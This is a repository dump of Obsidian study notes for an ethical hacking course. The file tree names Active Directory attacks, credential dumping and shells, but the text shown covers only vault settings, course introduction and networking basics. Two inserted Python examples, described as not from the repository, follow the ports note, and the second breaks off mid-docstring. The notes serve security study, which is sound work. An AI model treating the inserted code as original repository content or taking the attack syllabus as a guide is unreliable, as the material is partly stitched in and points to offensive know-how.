├── .DS_Store ├── .obsidian ├── app.json ├── appearance.json ├── community-plugins.json ├── core-plugins-migration.json ├── core-plugins.json ├── graph.json ├── hotkeys.json ├── plugins │ ├── obsidian-discordrpc │ │ ├── data.json │ │ ├── main.js │ │ └── manifest.json │ ├── obsidian-git │ │ ├── data.json │ │ ├── main.js │ │ ├── manifest.json │ │ └── styles.css │ ├── obsidian-mind-map │ │ ├── main.js │ │ └── manifest.json │ └── table-editor-obsidian │ │ ├── data.json │ │ ├── main.js │ │ ├── manifest.json │ │ └── styles.css ├── themes │ └── Catppuccin │ │ ├── manifest.json │ │ └── theme.css └── workspace.json ├── Practical Ethical Hacking - The Complete Course ├── .DS_Store ├── 01. Introduction │ ├── 01. Course Introduction.md │ └── 02. A Day in the Life of an Ethical Hacker.md ├── 02. Notekeeping │ └── 01. Effective Notekeeping.md ├── 03. Networking Refresher │ ├── 00. image │ │ ├── Network Refresher - OSI Model.png │ │ ├── Network Refresher - Private IP Address.jpg │ │ ├── Network Refresher - Subnetting.webp │ │ └── Subnetting Part 1 & 2 Exel sheet.png │ ├── 01. Introduction.md │ ├── 02. IP Addresses.md │ ├── 03. MAC Addresses.md │ ├── 04. TCP, UDP and the Three Way Handshake.md │ ├── 05. Common Ports and Protocols.md │ ├── 06. The OSI Model.md │ └── 07. Subnetting Part 1 & 2.md ├── 04. Introduction to Linux │ ├── 01. Exploring Kali Linux.md │ ├── 02. Sudo Overview.md │ ├── 03. Navigating the File System.md │ ├── 04. Users and Privileges.md │ ├── 05. Common Network Commands.md │ ├── 06. Viewing, Creating, and Editing Files.md │ ├── 07. Starting and Stopping Services.md │ ├── 08. Installing and Updating Tools.md │ └── 09. Scripting with Bash.md ├── 05. Introduction to Python │ ├── 01. Introduction.md │ ├── 02. Strings.md │ ├── 03. Math.md │ ├── 04. Variables and Methods.md │ ├── 05. Functions.md │ ├── 06. Boolean Expressions and Relational Operators.md │ ├── 07. Conditional Statements.md │ ├── 08. Lists.md │ ├── 09. Tuples.md │ ├── 10. Looping.md │ ├── 11. 
Advanced Strings.md │ ├── 12. Dictionaries.md │ ├── 13. Importing Modules.md │ ├── 14. Sockets.md │ ├── 15. Building a Port Scanner.md │ ├── 16. User Input.md │ ├── 17. Reading and Writing Files.md │ ├── 18. Classes and Objects.md │ └── 19. Building a Shoe Budget Tool.md ├── 06. The Ethical Hacker Methodology │ ├── 00. Image │ │ └── The Five Stages of Ethical Hacking 01.png │ └── 01. The Five Stages of Ethical Hacking.md ├── 07. Information Gathering (Reconnaissance) │ ├── 00. image │ │ ├── Passive Reconnaissance Overview 01.png │ │ └── Passive Reconnaissance Overview 02.png │ ├── 01. Passive Reconnaissance Overview.md │ ├── 02. Gathering Email and Breached Credentials.md │ ├── 03. Hunting Subdomains Part 1, 2.md │ ├── 04. Identifying Website Technologies.md │ └── 05. Google Fu.md ├── 10. Exploitation Basics │ ├── 01. Shells & Payloads.md │ └── 02. Brute Force Attacks, Credential Stuffing & Password Spraying.md ├── 11. New Capstone │ ├── 00. image │ │ ├── Capstone Academy01.png │ │ ├── Capstone Academy02.png │ │ ├── Capstone Dev01.png │ │ ├── Capstone Dev02.png │ │ └── Capstone Dev03.png │ ├── 01. Blue.md │ ├── 02. Academy.md │ ├── 03. Dev.md │ └── 04. Blackpearl.md ├── 12. Active Directory Overview │ ├── 01. Active Directory Overview.md │ └── 02. Physical & Logical AD Components.md ├── 14. Attacking Active Directory (Initial Attack Vectors) │ ├── .DS_Store │ ├── 00. image │ │ ├── .DS_Store │ │ ├── LLMNR Poisoning Overview 01.png │ │ ├── Passback Attacks 01.webp │ │ ├── Passback Attacks 02.webp │ │ ├── Passback Attacks 03.webp │ │ └── Passback Attacks 04.webp │ ├── 01. LLMNR Poisoning Overview.md │ ├── 02. Capturing Hashes with Responder.md │ ├── 03. Cracking Our Captured Hashes.md │ ├── 04. LLMNR Poison Mitigation.md │ ├── 05. SMB Relay Attacks Overview.md │ ├── 06. SMB Relay Attacks Lab.md │ ├── 07. SMB Relay Attack Defenses.md │ ├── 08. Gaining Shell Access.md │ ├── 09. IPv6 Attacks Overview.md │ ├── 10. IPv6 DNS Takeover via mitm6.md │ ├── 11. 
IPv6 Attack Defenses.md │ ├── 12. Passback Attacks.md │ └── 13. Initial Internal Attack Strategy.md ├── 15. Attacking Active Directory (Post-Compromise Enumeration) │ ├── 00. image │ │ ├── domain enumeration with ldapdomaindump 01.png │ │ └── domain enumeration with plumhound 01.png │ ├── 01. Domain Enumeration with ldapdomaindump.md │ ├── 02. Domain Enumeration with Bloodhound.md │ └── 03. Domain Enumeration with Plumhound.md ├── 16. Attacking Active Directory (Post-Compromise Attacks) │ ├── 00. image │ │ └── kerberosting overview 01.png │ ├── 01. Pass Attacks Overview.md │ ├── 01.5. Crackmapexec large Cheatsheet.md │ ├── 02. Pass Attacks.md │ ├── 03. Dumping and Cracking Hashes.md │ ├── 04. Pass Attack Mitigations.md │ ├── 05. Kerberoasting Overview.md │ ├── 06. Kerberosting Walkthrough.md │ ├── 07. Kerberoasting Mitigation.md │ ├── 08. Token Impersonation Overview.md │ ├── 10. Token Impersonation Mitigation.md │ ├── Mimikatz Overview & Credential Dumping.md │ └── Mimikatz large Cheatsheet.md ├── 17. We've Compromised the Domain - Now What │ └── 01. Post-Domain Compromise Attack Strategy.md ├── 20. Post Exploitation │ ├── 00. Image │ │ └── pivoting.webp │ ├── 01. File Transfers Review.md │ ├── 02. Maintaining Access Overview.md │ ├── 03. Pivoting.md │ └── Cleaning Up.md ├── 21. Web Application Enumeration, Revisited │ ├── 01. Finding Subdomains with Assetfinder.md │ ├── 02. Finding Subdomains with Amass.md │ ├── 03. Finding Alive Domains with Httprobe.md │ ├── 04. Screenshotting Websites with GoWitness.md │ └── 05. Automating the Enumeration Process.md ├── 22. Find & Exploit Common Web Vulnerabilities │ └── 01. SQL Injection - UNION.md └── 23. Wireless Penetration Testing │ ├── 01. Wireless Penetration Testing Overview.md │ └── 02. 
WPA PS2 Exploit Walkthrough.md └── README.md /.DS_Store: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/MrMidnight7331/PJPT-Notes/06491b77f23cfb4dfce939eef5fc8e36f57645fd/.DS_Store -------------------------------------------------------------------------------- /.obsidian/app.json: -------------------------------------------------------------------------------- 1 | { 2 | "promptDelete": false, 3 | "alwaysUpdateLinks": true 4 | } -------------------------------------------------------------------------------- /.obsidian/appearance.json: -------------------------------------------------------------------------------- 1 | { 2 | "accentColor": "", 3 | "cssTheme": "Catppuccin", 4 | "baseFontSize": 16, 5 | "nativeMenus": false 6 | } -------------------------------------------------------------------------------- /.obsidian/community-plugins.json: -------------------------------------------------------------------------------- 1 | [ 2 | "obsidian-git", 3 | "obsidian-discordrpc", 4 | "obsidian-mind-map", 5 | "table-editor-obsidian" 6 | ] -------------------------------------------------------------------------------- /.obsidian/core-plugins-migration.json: -------------------------------------------------------------------------------- 1 | { 2 | "file-explorer": true, 3 | "global-search": true, 4 | "switcher": true, 5 | "graph": true, 6 | "backlink": true, 7 | "canvas": true, 8 | "outgoing-link": true, 9 | "tag-pane": true, 10 | "properties": false, 11 | "page-preview": true, 12 | "daily-notes": true, 13 | "templates": true, 14 | "note-composer": true, 15 | "command-palette": true, 16 | "slash-command": false, 17 | "editor-status": true, 18 | "bookmarks": true, 19 | "markdown-importer": false, 20 | "zk-prefixer": false, 21 | "random-note": false, 22 | "outline": true, 23 | "word-count": true, 24 | "slides": false, 25 | "audio-recorder": false, 26 | "workspaces": false, 27 | "file-recovery": true, 28 | 
"publish": false, 29 | "sync": false 30 | } -------------------------------------------------------------------------------- /.obsidian/core-plugins.json: -------------------------------------------------------------------------------- 1 | [ 2 | "file-explorer", 3 | "global-search", 4 | "switcher", 5 | "graph", 6 | "backlink", 7 | "canvas", 8 | "outgoing-link", 9 | "tag-pane", 10 | "page-preview", 11 | "daily-notes", 12 | "templates", 13 | "note-composer", 14 | "command-palette", 15 | "editor-status", 16 | "bookmarks", 17 | "outline", 18 | "word-count", 19 | "file-recovery" 20 | ] -------------------------------------------------------------------------------- /.obsidian/graph.json: -------------------------------------------------------------------------------- 1 | { 2 | "collapse-filter": false, 3 | "search": "", 4 | "showTags": false, 5 | "showAttachments": false, 6 | "hideUnresolved": false, 7 | "showOrphans": true, 8 | "collapse-color-groups": true, 9 | "colorGroups": [], 10 | "collapse-display": true, 11 | "showArrow": false, 12 | "textFadeMultiplier": 0, 13 | "nodeSizeMultiplier": 1, 14 | "lineSizeMultiplier": 1, 15 | "collapse-forces": false, 16 | "centerStrength": 0.420328776041667, 17 | "repelStrength": 7.73274739583333, 18 | "linkStrength": 0.44677734375, 19 | "linkDistance": 297, 20 | "scale": 1.0453226881348727, 21 | "close": true 22 | } -------------------------------------------------------------------------------- /.obsidian/hotkeys.json: -------------------------------------------------------------------------------- 1 | { 2 | "obsidian-git:commit": [ 3 | { 4 | "modifiers": [ 5 | "Mod", 6 | "Shift" 7 | ], 8 | "key": "C" 9 | } 10 | ], 11 | "obsidian-git:push2": [ 12 | { 13 | "modifiers": [ 14 | "Mod", 15 | "Shift" 16 | ], 17 | "key": "V" 18 | } 19 | ], 20 | "obsidian-git:pull": [ 21 | { 22 | "modifiers": [ 23 | "Mod", 24 | "Shift" 25 | ], 26 | "key": "X" 27 | } 28 | ], 29 | "obsidian-mind-map:app:markmap-preview": [ 30 | { 31 | "modifiers": [ 32 | 
"Mod", 33 | "Shift" 34 | ], 35 | "key": "M" 36 | } 37 | ] 38 | } -------------------------------------------------------------------------------- /.obsidian/plugins/obsidian-discordrpc/data.json: -------------------------------------------------------------------------------- 1 | { 2 | "showVaultName": true, 3 | "showCurrentFileName": true, 4 | "showPopups": true, 5 | "customVaultName": "", 6 | "showFileExtension": true, 7 | "useLoadedTime": true, 8 | "connectOnStart": true, 9 | "autoHideStatusBar": true 10 | } -------------------------------------------------------------------------------- /.obsidian/plugins/obsidian-discordrpc/manifest.json: -------------------------------------------------------------------------------- 1 | { 2 | "id": "obsidian-discordrpc", 3 | "name": "Discord Rich Presence", 4 | "version": "1.5.1", 5 | "description": "Update your Discord Status to show your friends what you are working on in Obsidian. With Discord Rich Presence.", 6 | "author": "Luke Leppan", 7 | "authorUrl": "https://lukeleppan.com", 8 | "isDesktopOnly": true 9 | } 10 | -------------------------------------------------------------------------------- /.obsidian/plugins/obsidian-git/data.json: -------------------------------------------------------------------------------- 1 | { 2 | "commitMessage": "vault backup: {{date}}", 3 | "commitDateFormat": "YYYY-MM-DD HH:mm:ss", 4 | "autoSaveInterval": 0, 5 | "autoPushInterval": 0, 6 | "autoPullInterval": 0, 7 | "autoPullOnBoot": true, 8 | "disablePush": false, 9 | "pullBeforePush": true, 10 | "disablePopups": false, 11 | "listChangedFilesInMessageBody": false, 12 | "showStatusBar": true, 13 | "updateSubmodules": false, 14 | "syncMethod": "merge", 15 | "customMessageOnAutoBackup": false, 16 | "autoBackupAfterFileChange": false, 17 | "treeStructure": false, 18 | "refreshSourceControl": true, 19 | "basePath": "", 20 | "differentIntervalCommitAndPush": false, 21 | "changedFilesInStatusBar": false, 22 | "showedMobileNotice": true, 23 | 
"refreshSourceControlTimer": 7000, 24 | "showBranchStatusBar": true, 25 | "setLastSaveToLastCommit": true, 26 | "submoduleRecurseCheckout": false, 27 | "gitDir": "", 28 | "showFileMenu": true, 29 | "lineAuthor": { 30 | "show": false, 31 | "followMovement": "inactive", 32 | "authorDisplay": "initials", 33 | "showCommitHash": false, 34 | "dateTimeFormatOptions": "date", 35 | "dateTimeFormatCustomString": "YYYY-MM-DD HH:mm", 36 | "dateTimeTimezone": "viewer-local", 37 | "coloringMaxAge": "1y", 38 | "colorNew": { 39 | "r": 255, 40 | "g": 150, 41 | "b": 150 42 | }, 43 | "colorOld": { 44 | "r": 120, 45 | "g": 160, 46 | "b": 255 47 | }, 48 | "textColorCss": "var(--text-muted)", 49 | "ignoreWhitespace": false, 50 | "gutterSpacingFallbackLength": 5, 51 | "lastShownAuthorDisplay": "initials", 52 | "lastShownDateTimeFormatOptions": "date" 53 | }, 54 | "autoCommitMessage": "vault backup: {{date}}" 55 | } -------------------------------------------------------------------------------- /.obsidian/plugins/obsidian-git/manifest.json: -------------------------------------------------------------------------------- 1 | { 2 | "id": "obsidian-git", 3 | "name": "Git", 4 | "description": "Backup your vault with Git.", 5 | "isDesktopOnly": false, 6 | "fundingUrl": "https://ko-fi.com/vinzent", 7 | "js": "main.js", 8 | "version": "2.24.1" 9 | } 10 | -------------------------------------------------------------------------------- /.obsidian/plugins/obsidian-mind-map/manifest.json: -------------------------------------------------------------------------------- 1 | { 2 | "id": "obsidian-mind-map", 3 | "name": "Mind Map", 4 | "version": "1.1.0", 5 | "description": "A plugin to preview notes as Markmap mind maps", 6 | "isDesktopOnly": false, 7 | "js": "main.js" 8 | } -------------------------------------------------------------------------------- /.obsidian/plugins/table-editor-obsidian/data.json: -------------------------------------------------------------------------------- 1 | { 2 | 
"formatType": "normal", 3 | "showRibbonIcon": true, 4 | "bindEnter": true, 5 | "bindTab": true 6 | } -------------------------------------------------------------------------------- /.obsidian/plugins/table-editor-obsidian/manifest.json: -------------------------------------------------------------------------------- 1 | { 2 | "id": "table-editor-obsidian", 3 | "name": "Advanced Tables", 4 | "author": "Tony Grosinger", 5 | "authorUrl": "https://grosinger.net", 6 | "description": "Improved table navigation, formatting, manipulation, and formulas", 7 | "isDesktopOnly": false, 8 | "minAppVersion": "1.0.0", 9 | "version": "0.21.0", 10 | "js": "main.js", 11 | "fundingUrl": { 12 | "Github Sponsor": "https://github.com/sponsors/tgrosinger", 13 | "Buy me a Coffee": "https://buymeacoffee.com/tgrosinger", 14 | "Paypal": "https://paypal.me/tgrosinger" 15 | }, 16 | "donation": "https://buymeacoffee.com/tgrosinger" 17 | } -------------------------------------------------------------------------------- /.obsidian/plugins/table-editor-obsidian/styles.css: -------------------------------------------------------------------------------- 1 | :root { 2 | --advanced-tables-helper-size: 28px; 3 | } 4 | 5 | .HyperMD-table-row span.cm-inline-code { 6 | font-size: 100%; 7 | padding: 0px; 8 | } 9 | 10 | .advanced-tables-buttons>div>.title { 11 | font-weight: var(--font-medium); 12 | font-size: var(--nav-item-size); 13 | color: var(--nav-item-color); 14 | text-decoration: underline; 15 | } 16 | 17 | [data-type="advanced-tables-toolbar"] .nav-buttons-container { 18 | column-gap: 0.2rem; 19 | margin: 0.2rem 0 0.2rem 0; 20 | justify-content: start; 21 | } 22 | 23 | [data-type="advanced-tables-toolbar"] .nav-buttons-container::before { 24 | min-width: 2.6rem; 25 | line-height: var(--advanced-tables-helper-size); 26 | font-size: var(--nav-item-size); 27 | font-weight: var(--nav-item-weight); 28 | color: var(--nav-item-color); 29 | } 30 | 31 | [data-type="advanced-tables-toolbar"] 
.nav-buttons-container>* { 32 | height: var(--advanced-tables-helper-size); 33 | line-height: var(--advanced-tables-helper-size); 34 | } 35 | 36 | [data-type="advanced-tables-toolbar"] .nav-buttons-container .nav-action-button { 37 | width: var(--advanced-tables-helper-size); 38 | height: var(--advanced-tables-helper-size); 39 | display: flex; 40 | justify-content: center; 41 | align-items: center; 42 | border-radius: var(--radius-s); 43 | } 44 | 45 | [data-type="advanced-tables-toolbar"] .nav-buttons-container .nav-action-button:hover { 46 | background-color: var(--nav-item-background-hover); 47 | color: var(--nav-item-color-hover); 48 | font-weight: var(--nav-item-weight-hover); 49 | } 50 | 51 | .advanced-tables-row-label { 52 | width: 50px; 53 | } 54 | 55 | .widget-icon { 56 | width: 20px; 57 | height: 20px; 58 | fill: var(--text-muted); 59 | } 60 | 61 | .widget-icon:hover { 62 | fill: var(--text-normal); 63 | } 64 | 65 | .advanced-tables-csv-export textarea { 66 | height: 200px; 67 | width: 100%; 68 | } 69 | 70 | .advanced-tables-donation { 71 | width: 70%; 72 | margin: 0 auto; 73 | text-align: center; 74 | } 75 | 76 | .advanced-tables-donate-button { 77 | margin: 10px; 78 | } -------------------------------------------------------------------------------- /.obsidian/themes/Catppuccin/manifest.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "Catppuccin", 3 | "version": "0.4.18", 4 | "minAppVersion": "1.0.0", 5 | "author": "Marshall Beckrich", 6 | "authorUrl": "https://github.com/catppuccin/obsidian" 7 | } 8 | -------------------------------------------------------------------------------- /Practical Ethical Hacking - The Complete Course/.DS_Store: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/MrMidnight7331/PJPT-Notes/06491b77f23cfb4dfce939eef5fc8e36f57645fd/Practical Ethical Hacking - The Complete Course/.DS_Store 
--------------------------------------------------------------------------------
/Practical Ethical Hacking - The Complete Course/01. Introduction/01. Course Introduction.md:
--------------------------------------------------------------------------------
# Course Introduction
> 11.11.2023
---

**What is ethical hacking**
- Try to hack into a company (we are hired to do so)
- Breaking into networks
- Webserver hacking
- OSINT
- Plane hacking
- We have permission to hack!!!

**Requirements**
- Basic IT knowledge
- 12GB RAM required
- Wireless Hacking: wireless adapter that supports monitor mode
- Active Directory: 16GB RAM
--------------------------------------------------------------------------------
/Practical Ethical Hacking - The Complete Course/01. Introduction/02. A Day in the Life of an Ethical Hacker.md:
--------------------------------------------------------------------------------
# A Day in the Life of an Ethical Hacker
> 11.11.2023
---

**A Pentester's Day to Day**
- Perform an Assessment
- Write a Report
- Give a Debrief
- Talk about our findings

**Assessment: External Network Pentest**
- Assessing an organization's security from outside the network or property.
- Focuses heavily on OSINT (Open Source Intelligence): collecting data that might be beneficial.
- Lasts about 32-40 hours for the pentest + 6-16 hours for the report. Depends on the scope.

**Assessment: Internal Network Pentest**
- Assessing an organization's security from inside the network or property.
- Focuses heavily on Active Directory.
- Lasts about 32-40 hours for the pentest + 8-16 hours for the report. Depends on the scope.

**Assessment: Web Application Pentest**
- Assessing an organization's web app / web server.
- Focuses heavily on web based attacks and [OWASP](https://owasp.org).

**Assessment: Wireless Pentest**
- Focuses on wireless attacks. Depends on the wireless type that is being used (WPA2-PSK vs WPA2 Enterprise).
- Lasts about 4-8 hours per SSID. 2-4 hours for the report.

**Assessment: Physical Pentest & Social Engineering**
- Assessing an organization's physical security, aka social engineering (breaking into the building, picking locks, cloning tags, social engineering). Phishing campaign, smishing campaign (social engineering). Depends on the client.
- Focuses on tasks and goals from the client.
- Lasts about 16-40 hours. 4-8 hours for the report. Depends on the engagement.

**Other Assessments**
- Mobile Pentesting
- IOT (Internet of Things) Pentesting
- Red Team Engagement
- Purple Team Engagement
- ETC.

**Report Writing**
- Delivered within a week after the engagement (depends)
- Report should contain both non-technical and technical findings
- Recommendations for remediation should be clear to both executives and technical staff. (It should be very clear!) Also write how you got in and how one could patch it.

**Debrief**
- A walkthrough of the report and findings. Can be with technical or non-technical staff.
- Gives the client the opportunity to ask questions and raise concerns before the final report is released.
--------------------------------------------------------------------------------
/Practical Ethical Hacking - The Complete Course/02. Notekeeping/01. Effective Notekeeping.md:
--------------------------------------------------------------------------------
# Effective Notekeeping
> 11.11.2023
---

- Break notes down into domains
- Under each domain, subdomains
- Notes under each section
- Insert code into notes
- Break down into sections: enumeration, privilege escalation, ...
- Pictures are important!
- List of commands / attacks for each section

**Screenshot tools**
[GreenShot](https://getgreenshot.org/downloads)
[FlameShot](https://flameshot.org/)
--------------------------------------------------------------------------------
/Practical Ethical Hacking - The Complete Course/03. Networking Refresher/00. image/Network Refresher - OSI Model.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MrMidnight7331/PJPT-Notes/06491b77f23cfb4dfce939eef5fc8e36f57645fd/Practical Ethical Hacking - The Complete Course/03. Networking Refresher/00. image/Network Refresher - OSI Model.png
--------------------------------------------------------------------------------
/Practical Ethical Hacking - The Complete Course/03. Networking Refresher/00. image/Network Refresher - Private IP Address.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MrMidnight7331/PJPT-Notes/06491b77f23cfb4dfce939eef5fc8e36f57645fd/Practical Ethical Hacking - The Complete Course/03. Networking Refresher/00. image/Network Refresher - Private IP Address.jpg
--------------------------------------------------------------------------------
/Practical Ethical Hacking - The Complete Course/03. Networking Refresher/00. image/Network Refresher - Subnetting.webp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MrMidnight7331/PJPT-Notes/06491b77f23cfb4dfce939eef5fc8e36f57645fd/Practical Ethical Hacking - The Complete Course/03. Networking Refresher/00. image/Network Refresher - Subnetting.webp
--------------------------------------------------------------------------------
/Practical Ethical Hacking - The Complete Course/03. Networking Refresher/00. image/Subnetting Part 1 & 2 Exel sheet.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MrMidnight7331/PJPT-Notes/06491b77f23cfb4dfce939eef5fc8e36f57645fd/Practical Ethical Hacking - The Complete Course/03. Networking Refresher/00. image/Subnetting Part 1 & 2 Exel sheet.png
--------------------------------------------------------------------------------
/Practical Ethical Hacking - The Complete Course/03. Networking Refresher/01. Introduction.md:
--------------------------------------------------------------------------------
# Introduction
> 12.11.2023
---

- IP Addresses
- MAC Addresses
- TCP, UDP and Three Way Handshake
- Common Ports and Protocols
- The OSI Model
- Subnetting

**The OSI Model**
![[Network Refresher - OSI Model.png]]

**Subnetting**
![[Network Refresher - Subnetting.webp]]

--------------------------------------------------------------------------------
/Practical Ethical Hacking - The Complete Course/03. Networking Refresher/02. IP Addresses.md:
--------------------------------------------------------------------------------
# IP Addresses
> 12.11.2023
---

**Displaying the IP address**
```
ifconfig / linux
ipconfig / windows
```

**IPv4**
IPv4 addresses are *32-bit numerical addresses* represented in a dotted-decimal format, such as "192.168.0.1". Each section, or *octet*, of the address consists of *8 bits* and can range *from 0 to 255*. This allows for a total of approximately *4.3 billion unique addresses*.

**IPv6**
IPv6 addresses are *128-bit addresses* represented in a hexadecimal format, such as "2001:0db8:85a3:0000:0000:8a2e:0370:7334". The longer address length of IPv6 allows for a significantly larger number of unique addresses, approximately *3.4×10^38*. IPv6 addresses are *divided into eight groups* of *four hexadecimal digits*, separated by colons. *Leading zeros within a group can be omitted, and consecutive groups of zeros can be represented by a double colon (::)* to simplify the address.

**Summary**
In summary, IPv4 and IPv6 are versions of the Internet Protocol that provide unique addresses to devices on a network. IPv4 addresses are 32 bits long and IPv6 addresses are 128 bits long. IPv6 offers a larger address space and additional features compared to IPv4.

**Private IP Addresses**
![[Network Refresher - Private IP Address.jpg]]

--------------------------------------------------------------------------------
/Practical Ethical Hacking - The Complete Course/03. Networking Refresher/03. MAC Addresses.md:
--------------------------------------------------------------------------------
# MAC Addresses
> 12.11.2023
---

A MAC address (*Media Access Control*) is an *identifier assigned to network-capable devices by the manufacturer*. A MAC address is typically *48 bits in length*, represented by *6 pairs of hexadecimal digits* separated by hyphens or colons, e.g. "00:1A:2B:3C:4D:5E". The *first 3 pairs* of digits identify the *manufacturer* of the network card. The *last 3 pairs* are a *unique identifier for the specific device*.

MAC addresses are *important in Ethernet networks*: they allow devices to communicate with each other within the network. When data is sent from one device to another, *it is encapsulated within Ethernet frames that contain the destination MAC*. Routers forward the data to the destination.

MAC addresses are *specific to the local network* and do *not have global uniqueness like IP addresses*. They are *only relevant within the scope of the local network segment*.
--------------------------------------------------------------------------------
/Practical Ethical Hacking - The Complete Course/03. Networking Refresher/04. TCP, UDP and the Three Way Handshake.md:
--------------------------------------------------------------------------------
# TCP, UDP and the Three Way Handshake
> 12.11.2023
---

**TCP and UDP Overview:**
- *TCP (Transmission Control Protocol)* and *UDP (User Datagram Protocol)* are *transport layer* protocols in computer networks.
- TCP is *connection-oriented*, ensuring *reliable, ordered, and error-checked data delivery*.
- UDP is *connectionless, simpler, and lightweight*, suitable for *applications tolerating data loss* or delay.

**TCP Characteristics:**
- *Guarantees correct data delivery* through mechanisms like acknowledgement, retransmission, and flow control.
- *Breaks data into packets*, assigns sequence numbers, and ensures proper reassembly.
- *Widely used for applications* requiring guaranteed delivery, e.g., web browsing, email, file transfer.

**UDP Characteristics:**
- *Does not establish connections or guarantee packet delivery*, making it suitable for real-time applications.
- *Commonly used for streaming media*, online gaming, DNS, and VoIP.

**Three-Way Handshake (TCP):**
- Process to *establish a connection before data transmission*.
- *SYN (Synchronize)*: Client sends a SYN packet to the server.
- *SYN-ACK (Synchronize-Acknowledge)*: Server responds with the SYN and ACK flags set.
- *ACK (Acknowledge)*: Client acknowledges the SYN-ACK, confirming connection establishment.

**Post-Handshake Connection:**
- After the three-way handshake, devices are ready to exchange data.
- Sequence numbers ensure the correct order of data transmission and reception.

**Summary:**
- *TCP is reliable* and connection-oriented, ensuring data delivery.
- *UDP is simpler* and connectionless, suitable for applications tolerating some data loss.
- *The three-way handshake* involves SYN, SYN-ACK, and ACK packets for TCP connection establishment.
--------------------------------------------------------------------------------
/Practical Ethical Hacking - The Complete Course/03. Networking Refresher/05. Common Ports and Protocols.md:
--------------------------------------------------------------------------------
# Common Ports and Protocols
> 12.11.2023
---

Important ports and protocols in networking:

**FTP (File Transfer Protocol):**
- Port: 21 (TCP)

**SSH (Secure Shell):**
- Port: 22 (TCP)

**Telnet:**
- Port: 23 (TCP)

**SMTP (Simple Mail Transfer Protocol):**
- Port: 25 (TCP)

**DNS (Domain Name System):**
- Port: 53 (TCP and UDP)

**HTTP (Hypertext Transfer Protocol):**
- Port: 80 (TCP)

**HTTPS (Hypertext Transfer Protocol Secure):**
- Port: 443 (TCP)

**DHCP (Dynamic Host Configuration Protocol):**
- Ports: 67 (UDP), 68 (UDP)

**POP3 (Post Office Protocol version 3):**
- Port: 110 (TCP)

**IMAP (Internet Message Access Protocol):**
- Port: 143 (TCP)

**SNMP (Simple Network Management Protocol):**
- Port: 161 (UDP)

**RDP (Remote Desktop Protocol):**
- Port: 3389 (TCP)

**NTP (Network Time Protocol):**
- Port: 123 (UDP)

**SMB (Server Message Block):**
- Port: 445 (TCP)

**FTPS (FTP over SSL/TLS):**
- Port: 990 (TCP)

**TFTP (Trivial File Transfer Protocol):**
- Port: 69 (UDP)

**LDAP (Lightweight Directory Access Protocol):**
- Port: 389 (TCP and UDP)

**MySQL:**
- Port: 3306 (TCP)

Note: Some protocols use both TCP and UDP, and these port assignments are not exhaustive; other applications may use different ports.
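The IP Addresses and MAC Addresses notes above describe the three address formats in words. The following Python is an added example, not code from the PJPT-Notes repository or the course, that parses each format with the standard library only: it validates IPv4/IPv6 literals, shows the IPv6 compression rule (leading zeros dropped, the longest zero run written as `::`), flags RFC 1918 private ranges, and splits a MAC into its manufacturer and device halves while decoding the multicast and locally-administered bits of the first octet. The function names, the RFC 1918 list and the sample inventory entries are assumptions of this example.

```python
"""Added example, not from the PJPT-Notes repository: parsing and classifying the IPv4,
IPv6 and MAC address formats described in the networking notes, standard library only."""
import ipaddress
import re

# RFC 1918 private IPv4 ranges (general knowledge; the notes keep these in an image).
PRIVATE_V4 = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def describe_ip(text: str) -> dict:
    """Version, bit length, private flag and both IPv6 spellings of one address literal.

    ipaddress.ip_address raises ValueError for anything that is not a valid literal, which
    is the behaviour you want when the input comes from logs or inventory exports.
    """
    addr = ipaddress.ip_address(text.strip())
    if addr.version == 4:
        private = any(addr in net for net in PRIVATE_V4)
    else:
        private = addr.is_private                # fc00::/7 unique local and similar ranges
    return {
        "version": addr.version,
        "bits": addr.max_prefixlen,              # 32 for IPv4, 128 for IPv6
        "private": private,
        "compressed": addr.compressed,           # IPv6: leading zeros dropped, longest zero run -> "::"
        "exploded": addr.exploded,               # IPv6: all eight 4-digit groups written out
    }


def describe_mac(text: str) -> dict:
    """Split a 48-bit MAC into its manufacturer and device parts and decode the two flag bits."""
    parts = re.split(r"[:-]", text.strip())      # the note allows ':' or '-' as separator
    if len(parts) != 6 or not all(re.fullmatch(r"[0-9A-Fa-f]{2}", p) for p in parts):
        raise ValueError(f"not a 48-bit MAC address: {text!r}")
    octets = [int(p, 16) for p in parts]
    return {
        "oui": ":".join(f"{o:02X}" for o in octets[:3]),   # first 3 pairs: manufacturer (OUI)
        "nic": ":".join(f"{o:02X}" for o in octets[3:]),   # last 3 pairs: device-specific
        # Lowest bit of the first octet: 1 = group/multicast destination.
        "multicast": bool(octets[0] & 0x01),
        # Second-lowest bit: 1 = locally administered, i.e. not the burned-in address.
        # Randomised or manually changed MACs show up here, which is worth flagging in inventory.
        "locally_administered": bool(octets[0] & 0x02),
    }


def is_valid_mac(text: str) -> bool:
    """True if describe_mac accepts the string."""
    try:
        describe_mac(text)
        return True
    except ValueError:
        return False


# Constructed sample, as addresses might appear in an inventory export (not real data).
SAMPLE = ["192.168.0.1", "172.31.255.254", "172.32.0.1", "8.8.8.8", "10.0.0.300"]


def triage(entries) -> dict:
    """Count private and public entries; invalid literals are reported, not skipped silently."""
    summary = {"private": 0, "public": 0, "invalid": []}
    for entry in entries:
        try:
            info = describe_ip(entry)
        except ValueError:
            summary["invalid"].append(entry)
            continue
        summary["private" if info["private"] else "public"] += 1
    return summary


if __name__ == "__main__":
    print(triage(SAMPLE))
    print(describe_ip("2001:0db8:85a3:0000:0000:8a2e:0370:7334")["compressed"])
    print(describe_mac("00:1A:2B:3C:4D:5E"))
```

Note the `172.32.0.1` entry in the sample: it looks like a private address but sits just past the end of `172.16.0.0/12`, which is exactly the kind of boundary a manual check gets wrong and `ipaddress` gets right.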
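The SYN / SYN-ACK / ACK exchange from the three-way handshake note, as an added example that is not part of the original notes or the course: a small Python model of both endpoints that walks through the three steps and the sequence/acknowledgement arithmetic the note mentions (each side acknowledges the other's ISN + 1, and after the handshake data is accepted only at the expected sequence number). `Segment`, `Endpoint` and the functions below are assumptions of this example, not a real TCP stack; nothing is sent on a network.

```python
"""Added example, not from the PJPT-Notes repository: a minimal model of the TCP
three-way handshake and the sequence/acknowledgement arithmetic behind it.
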